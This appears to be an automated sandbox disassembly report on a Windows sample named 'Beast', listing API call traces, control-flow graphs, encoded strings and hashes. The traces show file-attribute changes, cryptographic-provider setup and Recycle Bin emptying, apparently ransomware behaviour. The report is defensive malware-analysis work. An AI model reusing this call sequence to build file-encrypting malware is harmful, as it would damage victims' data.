                                  Function 005CECD9 Relevance: 797.0, APIs: 80, Strings: 374, Instructions: 2464windowmemoryregistryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 0 5cecd9-5cecf1 1 5cecf7-5cef35 #17 GetModuleHandleW call 5cc34e lstrcpyW call 5c5c09 lstrcpyW RegisterClassW CreateWindowExW 0->1 2 5d1a83 0->2 1->2 8 5cef3b-5cef5d RtlAllocateHeap 1->8 4 5d1a85-5d1a89 2->4 9 5d1a6f-5d1a76 8->9 10 5cef63-5cef79 HeapAlloc 8->10 9->2 11 5d1a78-5d1a81 HeapFree 9->11 12 5cef7f-5d1380 InitializeCriticalSection CreateMenu CreatePopupMenu call 5d1f3c AppendMenuW call 5d1f2d AppendMenuW call 5d1e22 AppendMenuW call 5d1f1e AppendMenuW CreatePopupMenu call 5d1ded AppendMenuW call 5c9561 AppendMenuW CreatePopupMenu call 5d1efa AppendMenuW call 5d1ed6 AppendMenuW call 5d1eb5 AppendMenuW call 5d1ea6 AppendMenuW CreatePopupMenu call 5d1e97 AppendMenuW call 5d1e88 AppendMenuW call 5d1e67 AppendMenuW call 5d1e43 AppendMenuW call 5d1e22 AppendMenuW call 5d1db8 AppendMenuW CreatePopupMenu call 5d1d43 AppendMenuW call 5d1e11 AppendMenuW KiUserCallbackDispatcher GetWindowRect call 5d1ddc call 5d1ded CreateWindowExW GetWindowRect * 2 call 5d1db8 CreateWindowExW SendMessageW * 2 call 5d1cf2 call 5d1d64 CreateWindowExW call 5d1da9 CreateWindowExW call 5d1d85 CreateWindowExW call 5d1d64 CreateWindowExW call 5c5c09 CreateWindowExW call 5d1d43 CreateWindowExW call 5d1d34 CreateWindowExW 10->12 13 5d1a5b-5d1a62 10->13 11->2 73 5d138f-5d1393 12->73 13->2 15 5d1a64-5d1a6d HeapFree 13->15 15->9 74 5d1395-5d1a59 call 5d1d13 GetWindowRect CreateWindowExW SendMessageW GetWindowRect call 5d1cf2 SendMessageW call 5d1cd1 SendMessageW GetWindowRect * 2 CreateWindowExW SendMessageW GetWindowRect call 5d1cc2 SendMessageW call 5d1cb3 SendMessageW call 5c951f CreateFontW SendMessageW * 10 RegisterHotKey * 3 SetTimer DragAcceptFiles UpdateWindow 73->74 75 5d1382-5d138c 73->75 74->4 75->73
                                  APIs
                                  • #17.COMCTL32(?,?,00000000), ref: 005CECF7
                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000000), ref: 005CECFF
                                  • lstrcpyW.KERNEL32(BEAST CLASS,00000000,?,?,00000000), ref: 005CEDCF
                                  • lstrcpyW.KERNEL32(Beast,00000000,?,?,00000000), ref: 005CEE9C
                                  • RegisterClassW.USER32(?), ref: 005CEEF3
                                  • CreateWindowExW.USER32(00000000,BEAST CLASS,Beast,00CF0000,80000000,80000000,00000258,000001F4,00000000,00000000,00000000), ref: 005CEF28
                                  • RtlAllocateHeap.NTDLL(00000008,00010000,?,?,00000000), ref: 005CEF4E
                                  • HeapAlloc.KERNEL32(00000008,00000200,?,?,00000000), ref: 005CEF70
                                  • InitializeCriticalSection.KERNEL32(006DA3EC,?,?,00000000), ref: 005CEF94
                                  • CreateMenu.USER32 ref: 005CEFA2
                                  • CreatePopupMenu.USER32 ref: 005CEFB3
                                  • AppendMenuW.USER32(00000010,00000000), ref: 005CF078
                                  • AppendMenuW.USER32(00000000,0000029A,00000000), ref: 005CF141
                                  • AppendMenuW.USER32(00000000,00000534,00000000), ref: 005CF292
                                  • AppendMenuW.USER32(00000000,00001236,00000000), ref: 005CF2F9
                                  • CreatePopupMenu.USER32 ref: 005CF2FB
                                  • AppendMenuW.USER32(00000010,00000000), ref: 005CF3F3
                                  • AppendMenuW.USER32(00000000,000007CE,00000000), ref: 005CF5B6
                                  • CreatePopupMenu.USER32 ref: 005CF5B8
                                  • AppendMenuW.USER32(00000010,00000000), ref: 005CF6CE
                                  • AppendMenuW.USER32(00000000,00000A68,00000000), ref: 005CF838
                                  • AppendMenuW.USER32(00000000,00000D02,00000000), ref: 005CF91B
                                  • AppendMenuW.USER32(00000000,00000F9C,00000000), ref: 005CFA2A
                                  • CreatePopupMenu.USER32 ref: 005CFA2C
                                  • AppendMenuW.USER32(00000010,00000000), ref: 005CFAA7
                                  • AppendMenuW.USER32(00000000,000014D0,00000000), ref: 005CFC16
                                  • AppendMenuW.USER32(00000000,0000176A,00000000), ref: 005CFD82
                                  • AppendMenuW.USER32(00000000,00001A04,00000000), ref: 005CFF4C
                                  • AppendMenuW.USER32(00000000,00001C9E,00000000), ref: 005D0084
                                  • AppendMenuW.USER32(00000000,00001F38,00000000), ref: 005D02BE
                                  • CreatePopupMenu.USER32 ref: 005D02C0
                                  • AppendMenuW.USER32(00000010,00000000), ref: 005D0336
                                  • AppendMenuW.USER32(00000000,0000246C,00000000), ref: 005D03A3
                                  • KiUserCallbackDispatcher.NTDLL ref: 005D03B1
                                  • GetWindowRect.USER32(0002044E,?), ref: 005D03CD
                                  • CreateWindowExW.USER32(00000000,00000000,00000000,50000000,0000000A,0000000A,?,00000014,?,00000000,005C0000,00000000), ref: 005D087F
                                  • GetWindowRect.USER32(0002044E,?), ref: 005D08A6
                                  • GetWindowRect.USER32(?), ref: 005D08C4
                                  • CreateWindowExW.USER32(00000000,00000000,00000000,50000000,0000000A,?,?,0000000F,?,00000000,005C0000,00000000), ref: 005D0AD2
                                  • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 005D0AED
                                  • SendMessageW.USER32(00000402,00000000,00000000), ref: 005D0AFE
                                  • CreateWindowExW.USER32(00000000,00000000,00000000,50001000,0000000A,00000028,000000AA,00000019,0002044E,00002706,005C0000,00000000), ref: 005D0CCD
                                  • CreateWindowExW.USER32(00000000,00000000,00000000,50001000,0000000A,00000046,000000AA,00000019,0002044E,000029A0,005C0000,00000000), ref: 005D0E1C
                                  • CreateWindowExW.USER32(00000000,00000000,00000000,50001000,0000000A,00000064,000000AA,00000019,0002044E,00002C3A,005C0000,00000000), ref: 005D0FE6
                                  • CreateWindowExW.USER32(00000000,00000000,00000000,50001000,0000000A,00000082,000000AA,00000019,0002044E,00002ED4,005C0000,00000000), ref: 005D1142
                                  • CreateWindowExW.USER32(00000000,00000000,00000000,50001000,0000000A,000000A0,000000AA,00000019,0002044E,0000316E,005C0000,00000000), ref: 005D123D
                                  • CreateWindowExW.USER32(00000000,00000000,00000000,50001000,0000000A,000000BE,000000AA,00000019,0002044E,00003408,005C0000,00000000), ref: 005D12D5
                                  • CreateWindowExW.USER32(00000000,00000000,00000000,50001000,0000000A,000000DC,000000AA,00000019,0002044E,000036A2,005C0000,00000000), ref: 005D1372
                                  • GetWindowRect.USER32(0002044E,?), ref: 005D149C
                                  • CreateWindowExW.USER32(00000000,00000000,00000000,5080000D,000000BE,00000028,?,000000CD,0002044E,00000000,005C0000,00000000), ref: 005D14CF
                                  • SendMessageW.USER32(00000000,00001036,00000000,00014024), ref: 005D14EE
                                  • GetWindowRect.USER32(?), ref: 005D14FD
                                  • SendMessageW.USER32(00001061,00000000,00000006), ref: 005D15AE
                                  • SendMessageW.USER32(00001061,00000001,00000006), ref: 005D1669
                                  • GetWindowRect.USER32(0002044E,?), ref: 005D167F
                                  • GetWindowRect.USER32(?), ref: 005D16A4
                                  • CreateWindowExW.USER32(00000000,0000002C,00000000,5080000D,0000000A,000000FF,?,?,0002044E,00000000,005C0000,00000000), ref: 005D16D2
                                  • SendMessageW.USER32(00000000,00001036,00000000,00014021), ref: 005D16F0
                                  • GetWindowRect.USER32(?), ref: 005D16FF
                                  • SendMessageW.USER32(00001061,00000000,00000006), ref: 005D17AA
                                  • SendMessageW.USER32(00001061,00000001,00000006), ref: 005D1841
                                  • CreateFontW.GDI32(000000F4,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 005D1941
                                  • SendMessageW.USER32(00000030,00000000,00000000), ref: 005D1957
                                  • SendMessageW.USER32(00000030,00000000), ref: 005D1969
                                  • SendMessageW.USER32(00000030,00000000), ref: 005D197B
                                  • SendMessageW.USER32(00000030,00000000), ref: 005D198D
                                  • SendMessageW.USER32(00000030,00000000), ref: 005D199F
                                  • SendMessageW.USER32(00000030,00000000), ref: 005D19B1
                                  • SendMessageW.USER32(00000030,00000000), ref: 005D19C3
                                  • SendMessageW.USER32(00000030,00000000), ref: 005D19D5
                                  • SendMessageW.USER32(00000030,00000000), ref: 005D19E7
                                  • SendMessageW.USER32(00000030,00000000), ref: 005D19F9
                                  • RegisterHotKey.USER32(00000001,00000003,00000075,?,?,00000000), ref: 005D1A0E
                                  • RegisterHotKey.USER32(00000002,00000003,00000066,?,?,00000000), ref: 005D1A1B
                                  • RegisterHotKey.USER32(00000003,00000003,00000036,?,?,00000000), ref: 005D1A27
                                  • SetTimer.USER32(0000029A,0000000A,00000000), ref: 005D1A38
                                  • DragAcceptFiles.SHELL32(00000001), ref: 005D1A45
                                  • UpdateWindow.USER32 ref: 005D1A51
                                  • HeapFree.KERNEL32(00000000,015CDFD0,?,?,00000000), ref: 005D1A6D
                                  • HeapFree.KERNEL32(00000000,015DDFD8,?,?,00000000), ref: 005D1A81
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: Menu$Window$Create$AppendMessageSend$Rect$Popup$HeapRegister$Freelstrcpy$AcceptAllocAllocateCallbackClassCriticalDispatcherDragFilesFontHandleInitializeModuleSectionTimerUpdateUser
                                  • String ID: ^;^2^;^=^*^~^;^&^*^;^,^0^?^2^~^0^1^*^;^^$ $ $!$!$"$"$#$#$#$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%$&$&$&$&$'$($)$)$*$+$+$+$+$+$+$+$+$+$+$+$+$+$,$/$/$0$2$2$3$4$4$4$4$5$6$7$8$8$9$:$;$<$<$>$>$?$?$?$@$@$@$@$A$A$A$A$A$A$A$A$A$A$B$BEAST CLASS$Beast$D$D$E$F$G$G$H$I$I$I$I$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$K$K$K$L$L$L$L$L$L$L$L$L$L$L$M$M$M$N$Nb`}ahyh$O$O$P$P$P$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$S$S$T$T$T$T$V$W$W$W$W$W$W$X$X$Z$[$[$[$[n|n}$\$]$^$^$^$^$^yyv}$_$_$_$_$`$a$a$a$b$b$c$d$e$e$e$f$f$g$h$h$h$h$h$h$h$h$i$j$j$j$j$j$k$k$k$k8L8W8H88$l$m$m$m$m$n$n$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$p$p$p$p$p$p$p$p$p$p$p$p$p$q$q$q$q$q$q$q$r$r$r$r$r$s$s$s$s$s$s$s$t$t$t$t$t$t$t$t$u$u$u$u$v$v$v$v$v$w$w$w$w$w$w$w$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$y$y$y$y$y$z$z$z$z$z$z$z$z${${${${${${$|$}$}$~$~
                                  • API String ID: 603728933-1803527246
                                  • Opcode ID: 97a53892a3f75f32d01929819de93b667d0c3936085c877bd6b380b5b27823c9
                                  • Instruction ID: 5971362422c3b375a8e7c447da68665bb405edbaaf5ef72816249af72f7b4a90
                                  • Opcode Fuzzy Hash: 97a53892a3f75f32d01929819de93b667d0c3936085c877bd6b380b5b27823c9
                                  • Instruction Fuzzy Hash: 5753BD609096E8DEDB62CB689C487CDBFB55F26308F0440C9D1887B293C7B55B99CF26
                                  Function 005CC728 Relevance: 660.0, APIs: 65, Strings: 311, Instructions: 1975windowfilekeyboardCOMMON
                                  Download Yara Rule
                                  APIs
                                  • SendMessageW.USER32(00001004,00000000,00000000), ref: 005CC7F9
                                  • SendMessageW.USER32(0000102B,00000000,?), ref: 005CC82D
                                  • SendMessageW.USER32(00001004,00000000,00000000), ref: 005CC83D
                                  • DefWindowProcW.USER32(?,?,?,?), ref: 005CC855
                                  • SendMessageW.USER32(00001004,00000000,00000000), ref: 005CC876
                                  • SendMessageW.USER32(0000102B,00000000,?), ref: 005CC8AA
                                  • SendMessageW.USER32(00001004,00000000,00000000), ref: 005CC8BA
                                  • DestroyWindow.USER32(?), ref: 005CD96E
                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000658E,00000000,00000000,00000000), ref: 005CDC32
                                  • SHEmptyRecycleBinW.SHELL32(00000000,00000000,00000007), ref: 005CDECF
                                  • SendMessageW.USER32(00000111,0000316E,00000000), ref: 005CDF60
                                  • SendMessageW.USER32(00001009,00000000,00000000), ref: 005CDF70
                                  • SendMessageW.USER32(00001009,00000000,00000000), ref: 005CDF7B
                                  • SendMessageW.USER32(00000402,00000000,00000000), ref: 005CDF8A
                                  • SendMessageW.USER32(00000111,0000316E,00000000), ref: 005CE000
                                  • SendMessageW.USER32(0000000C,00000000,0000005B), ref: 005CE067
                                  • SendMessageW.USER32(0000000C,00000000,?), ref: 005CE158
                                  • SendMessageW.USER32(00001004,00000000,00000000), ref: 005CE1AC
                                  • SendMessageW.USER32(00001073,00000000,?), ref: 005CE1ED
                                  • SendMessageW.USER32(0000102C,00000000,0000F000), ref: 005CE204
                                  • SendMessageW.USER32(00001004,00000000,00000000), ref: 005CE256
                                  • DestroyWindow.USER32(?), ref: 005CE2D6
                                  • MoveWindow.USER32(0000000A,0000000A,-00000023,00000014,00000001), ref: 005CE302
                                  • MoveWindow.USER32(000000BE,00000028,-000000D7,000000CD,00000001), ref: 005CE325
                                  • MoveWindow.USER32(0000000A,000000FF,-00000023,-0000015E,00000001), ref: 005CE350
                                  • MoveWindow.USER32(0000000A,-00000055,-00000023,0000000F,00000001), ref: 005CE375
                                  • SendMessageW.USER32(0000101E,00000000,?), ref: 005CE39E
                                  • SendMessageW.USER32(0000101E,00000000,?), ref: 005CE3BC
                                  • UnregisterHotKey.USER32(?,00000001), ref: 005CE3CC
                                  • UnregisterHotKey.USER32(?,00000002), ref: 005CE3D1
                                  • UnregisterHotKey.USER32(?,00000003), ref: 005CE3D6
                                  • KillTimer.USER32(?,0000029A), ref: 005CE3DE
                                  • DeleteObject.GDI32 ref: 005CE3EA
                                  • UnregisterClassW.USER32(BEAST CLASS), ref: 005CE3FB
                                  • DeleteCriticalSection.KERNEL32(006DA3EC), ref: 005CE42A
                                  • PostQuitMessage.USER32(00000012), ref: 005CE432
                                  • GetKeyState.USER32(00000012), ref: 005CE461
                                  • GetKeyState.USER32(00000011), ref: 005CE46C
                                  • SendMessageW.USER32(00001004,00000000,00000000), ref: 005CE4F5
                                  • SendMessageW.USER32(0000104D,00000000,00000001), ref: 005CE53C
                                  • SendMessageW.USER32(00001074,?,?,?), ref: 005CE56D
                                  • SendMessageW.USER32(00000115,00000007,00000000), ref: 005CE57D
                                  • SendMessageW.USER32(00001004,00000000,00000000), ref: 005CE5A4
                                  • SendMessageW.USER32(00001073,00000000,?), ref: 005CE5E5
                                  • EnterCriticalSection.KERNEL32(012FFC04), ref: 005CE60B
                                  • LeaveCriticalSection.KERNEL32(?), ref: 005CE663
                                  • __aulldiv.LIBCMT ref: 005CE6A3
                                  • __aulldvrm.LIBCMT ref: 005CE6E0
                                  • SendMessageW.USER32 ref: 005CE734
                                  • SendMessageW.USER32(00001004,00000000,00000000), ref: 005CE74B
                                  • SendMessageW.USER32(00001004,00000000,00000000), ref: 005CE78C
                                  • SendMessageW.USER32(00001073,00000000,?), ref: 005CE7CB
                                  • lstrcmpiW.KERNEL32(?), ref: 005CE7D8
                                  • SendMessageW.USER32(00001004,00000000,00000000), ref: 005CE7F3
                                  • SendMessageW.USER32(00001004,00000000,00000000), ref: 005CE826
                                  • SendMessageW.USER32(0000104D,00000000,00000001), ref: 005CE88E
                                  • SendMessageW.USER32(00001074,?,00000001), ref: 005CE8BF
                                  • ShowWindow.USER32(?,00000000), ref: 005CE932
                                  • SendMessageW.USER32(0000069C,%D-D,?), ref: 005CEAA6
                                  • ShowWindow.USER32(?,00000005), ref: 005CEABA
                                  • PostMessageW.USER32(0000069B,00000000,00000000), ref: 005CEAD9
                                  • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 005CEBDD
                                  • DragQueryFileW.SHELL32(?,?,00000000,00008000), ref: 005CEC02
                                  • SendMessageW.USER32(0000102B,?,00000001), ref: 005CE8DB
                                    • Part of subcall function 005C5CD2: RtlFreeHeap.NTDLL(00000000,00000000,005C60D8), ref: 005C5CDB
                                  • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 005CEC5B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: Message$Send$Window$MoveUnregister$CriticalDragFileQuerySection$DeleteDestroyPostShowState$ClassCreateEmptyEnterFreeHeapKillLeaveObjectProcQuitRecycleThreadTimer__aulldiv__aulldvrmlstrcmpi
                                  • String ID: !$#$#$#$#$#$#$#$#$$$$$%$%$%$%$%$%$%$%D-D$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$($)$)$)$)$+$+$,$-$.$.$/$/$/$/$0$0$2$2$5$8$8$8$8$8$8$8$8$8$8$8$9$;$<$<$<$>$>$>$>$>$>$>$>$>$?$?$@$@$@$@$@$A$A$B$B$B$B$BEAST CLASS$C$C$D$D$D$D$D$D$D$D$D8]\$F$F$F$G$G$H$H$H$H$I$I$I$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$K$K$K$K$L$N$N$P$P$Q$Q$Q$Q$Q$R$S$T$T$T$T$U$U$U$V$V$W$W$W$W$Z$[$\$\$\$\$]$b$c$c$d$d$d$d$d$e$e$f$g$g$h$h$h$h$i$i$i$j$j$j$j$j$j$j$j$k$k$k$l$l$l$l$l$l$l$m$m$m$n$n$o$p$p$p$p$p$q$q$q$q$q$q$q$q$q$q$q$q$r$r$r$r$s$s$s$s$s$t$t$u$u$u$u$u$u$u$u$v$v$v$v$w$w$w$w$w$x$x$y$y$y$z$z$z$z${${${${$|$|$|$|$|$}$~$~$~$~$~$~
                                  • API String ID: 102032707-3859249477
                                  • Opcode ID: 83660af5e44aefbad8492202a3301fac6dae19096e5c6a1cb73d8c9e968f816a
                                  • Instruction ID: 1fa92bee4a3e033ef970e71fdf8a8594adad463d666bff02d75629bb66286ff2
                                  • Opcode Fuzzy Hash: 83660af5e44aefbad8492202a3301fac6dae19096e5c6a1cb73d8c9e968f816a
                                  • Instruction Fuzzy Hash: B1230C3050D3C0DEE3328B68D858BDBBFD5ABA6308F08485DD5C85B292C7BA5949C767
                                  Function 005CBB5F Relevance: 231.5, APIs: 11, Strings: 121, Instructions: 519comCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 467 5cbb5f-5cbb8b CoInitializeEx 468 5cbb8d-5cbb8f 467->468 469 5cbb94-5cbba9 CoInitializeSecurity 467->469 470 5cc0a2-5cc0a5 468->470 471 5cbbaf-5cbbdd CoCreateInstance GetNativeSystemInfo 469->471 472 5cc050 469->472 473 5cbdc7-5cbe29 471->473 474 5cbbe3-5cbbf8 CoCreateInstance 471->474 475 5cc053-5cc058 472->475 479 5cbe2b-5cbe34 473->479 474->472 476 5cbbfe-5cbd74 VariantInit 474->476 477 5cc05a-5cc060 475->477 478 5cc063-5cc068 475->478 480 5cbd7a-5cbd94 476->480 477->478 482 5cc06a-5cc06c 478->482 483 5cc073-5cc078 478->483 479->479 481 5cbe36-5cbe4d 479->481 480->480 486 5cbd96-5cbdab 480->486 481->472 492 5cbe53-5cbe69 CoSetProxyBlanket 481->492 489 5cc070 482->489 484 5cc07a-5cc080 483->484 485 5cc083-5cc085 483->485 484->485 490 5cc08d-5cc092 485->490 491 5cc087-5cc089 485->491 496 5cbdb0-5cbdc1 VariantClear 486->496 489->483 494 5cc09a-5cc0a0 CoUninitialize 490->494 495 5cc094-5cc096 490->495 491->490 492->472 497 5cbe6f-5cbff2 492->497 494->470 495->494 496->472 496->473 498 5cbff4-5cc000 497->498 498->498 499 5cc002-5cc024 498->499 500 5cc026-5cc02f 499->500 500->500 501 5cc031-5cc04a 500->501 501->472 503 5cc320-5cc325 501->503 504 5cc32b 503->504 505 5cc0a6-5cc0b7 503->505 506 5cc330-5cc333 504->506 507 5cc0bb-5cc0bd 505->507 506->475 508 5cc32d 507->508 509 5cc0c3-5cc0c9 507->509 508->506 509->508 510 5cc0cf-5cc151 VariantInit 509->510 511 5cc157-5cc171 510->511 511->511 512 5cc173-5cc191 511->512 514 5cc197-5cc1ab 512->514 515 5cc313-5cc31a VariantClear 512->515 514->515 517 5cc1b1-5cc239 514->517 515->503 518 5cc23c-5cc24d 517->518 518->518 519 5cc24f-5cc2e2 518->519 520 5cc2e5-5cc2f8 519->520 520->520 521 5cc2fa-5cc310 call 5d1c06 520->521 521->515
                                  APIs
                                  • CoInitializeEx.OLE32(00000000,00000000,00000000,00000000), ref: 005CBB83
                                  • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 005CBBA1
                                  • CoCreateInstance.OLE32(006C449C,00000000,00000001,006C43CC,?), ref: 005CBBC6
                                  • GetNativeSystemInfo.KERNEL32(?), ref: 005CBBCF
                                  • CoCreateInstance.OLE32(006C44AC,00000000,00000001,006C440C,?), ref: 005CBBF4
                                  • VariantInit.OLEAUT32(?), ref: 005CBC05
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: CreateInitializeInstance$InfoInitNativeSecuritySystemVariant
                                  • String ID: "$#$#$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$%$)$)$.$.$/$/$/$6$7$8$8$8$8$<$=$>$>$?$@$@$E$G$G$G$I$I$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$K$K$L$N$P$Q$Q$Q$Q$Q$Q$Q$Q$Q$S$S$T$T$V$W$W$W$X$X$Z$Z$[$]$]$^$_$a$a[V$c$e$g$h$l$m$r$s$s$t$w${$}
                                  • API String ID: 158163671-1673776140
                                  • Opcode ID: c197faad08d83618182503a6f152f273aaa8c32aa2fb8ddd8da803b6c243aa73
                                  • Instruction ID: d860e396461fb299620b06eee1fcf936fd0ee5f32a9f3c21c3947d8d545102a9
                                  • Opcode Fuzzy Hash: c197faad08d83618182503a6f152f273aaa8c32aa2fb8ddd8da803b6c243aa73
                                  • Instruction Fuzzy Hash: 4A42E5609083DDDDEF21C7A8C858BDEBFB55F26308F0440D9D5897B282C3B94A49DB26
                                  Function 005C7413 Relevance: 137.0, APIs: 4, Strings: 74, Instructions: 526encryptionCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 524 5c7413-5c74fa 525 5c74fc-5c7505 524->525 525->525 526 5c7507-5c7522 CryptAcquireContextA 525->526 527 5c7528-5c76ad 526->527 528 5c7be4-5c7be7 526->528 529 5c76b3-5c76cd 527->529 529->529 530 5c76cf-5c76ed CryptAcquireContextA 529->530 530->528 531 5c76f3-5c78cc 530->531 532 5c78d2-5c78ec 531->532 532->532 533 5c78ee-5c790c CryptAcquireContextA 532->533 533->528 534 5c7912-5c7bac 533->534 535 5c7baf-5c7bc2 534->535 535->535 536 5c7bc4-5c7bde CryptAcquireContextA 535->536 536->528
                                  APIs
                                  • CryptAcquireContextA.ADVAPI32(006D9868,00000000,00000005,00000018,F0000000,?,00000000), ref: 005C751E
                                  • CryptAcquireContextA.ADVAPI32(006D9868,00000000,00000020,00000018,F0000008,?,00000000), ref: 005C76E9
                                  • CryptAcquireContextA.ADVAPI32(006D9868,00000000,0000000B,00000018,F0000000,?,00000000), ref: 005C7908
                                  • CryptAcquireContextA.ADVAPI32(006D9868,00000000,?,00000018,F0000008,?,00000000), ref: 005C7BD8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: AcquireContextCrypt
                                  • String ID: $ $!$"$"$"$#$#$#$%$%$%$'$'$'$($($($($($)$)$)$)$)$)$,$,$.$.$.$/$/$/$0$2$2$2$2$4$4$4$4$4$4$5$6$6$6$=$>$>$?$?$?$F$M$M$M$M$M$M$Rnhwtxtky%Jsmfshji%WXF%fsi%FJX%Hw~uytlwfumnh%Uwt{nijw$d$f$f$f$f$f$f$f$m$n$o
                                  • API String ID: 3951991833-349774712
                                  • Opcode ID: d256fe43f26905f0c0abf837f843670ec737893080e257c00fdb9fa50def0246
                                  • Instruction ID: 9b80b4b00c54f387f5069d2987e6c9898a72a2fda3f55a5f490017b07d9dea29
                                  • Opcode Fuzzy Hash: d256fe43f26905f0c0abf837f843670ec737893080e257c00fdb9fa50def0246
                                  • Instruction Fuzzy Hash: EF428C209093D8DEEF62D7AC94447DEBFB15F2234CF0850D9D1887B243C2B55A9ADB26
                                  Function 005C1A4D Relevance: 122.0, APIs: 62, Strings: 7, Instructions: 1235filestringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetFileAttributesW.KERNEL32(00000000,75920F00,00000000,00000000), ref: 005C1A7F
                                  • SetFileAttributesW.KERNEL32(00000000,00000000), ref: 005C1A97
                                  • SetFileAttributesW.KERNEL32(00000000,00000000), ref: 005C1AAA
                                  • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 005C1ABE
                                  • GetLastError.KERNEL32 ref: 005C1ACA
                                  • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 005C1AFB
